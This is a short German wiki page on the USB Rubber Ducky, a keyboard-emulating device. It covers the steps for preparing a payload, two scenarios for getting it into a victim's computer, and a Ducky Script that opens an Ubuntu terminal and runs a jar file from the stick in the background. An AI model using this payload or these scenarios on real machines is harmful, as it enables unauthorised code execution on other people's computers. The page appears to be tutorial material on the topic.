USB: Rubber Ducky

From
Revision as of 22:42, 13 October 2017 by Waackphi (talk | contribs) (Created page with "== Grundlagen == [..] Rubber Ducky ist ein Microcontroller (AMTEL 32bit) mit SD-Karte der aussieht wie ein USB-Stick und sich verhält wie eine Tastatur. So kann alles mit dem …")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Grundlagen

[..]

Rubber Ducky ist ein Microcontroller (AMTEL 32bit) mit SD-Karte der aussieht wie ein USB-Stick und sich verhält wie eine Tastatur. So kann alles mit dem Gerät gemacht werden, was mit der Tastatur gemacht werden könnte.

Allg. Ablauf:

1.SD-Karte einstecken

2.Ducky-Script encoden (.jar oder Website toolkit) zu .bin

3.Payload (.bin) auf SD-Karte ablegen

4.USB-Stick in Opfer-Rechner stecken

5.Payload führt sich automatisch aus

Angriffsszenarien

-1.Angriffsszenario: Angreifer kann selbst (zumindest für einen kurzen Zeitraum) auf das Gerät physisch zugreifen und den RubberDucky selbst einstecken.

-2. Angriffsszenario: Angreifer muss Oper dazu bewegen, selbst RubberDucky in den Zielrechner einzustecken.

Bash starten

-1.Problem: Betriebssystem ermitteln

1.Lösungsansatz: Hotkeys

DetourDuck

REM open terminal on ubuntu-distros

DELAY 500

CTRL-ALT t

DELAY 50

ENTER

DELAY 5000

STRING java -jar /media/$USER/DUCKYDRIVE/RubberDucky.jar &

DELAY 50

ENTER

DELAY 5000

STRING exit

DELAY 50

ENTER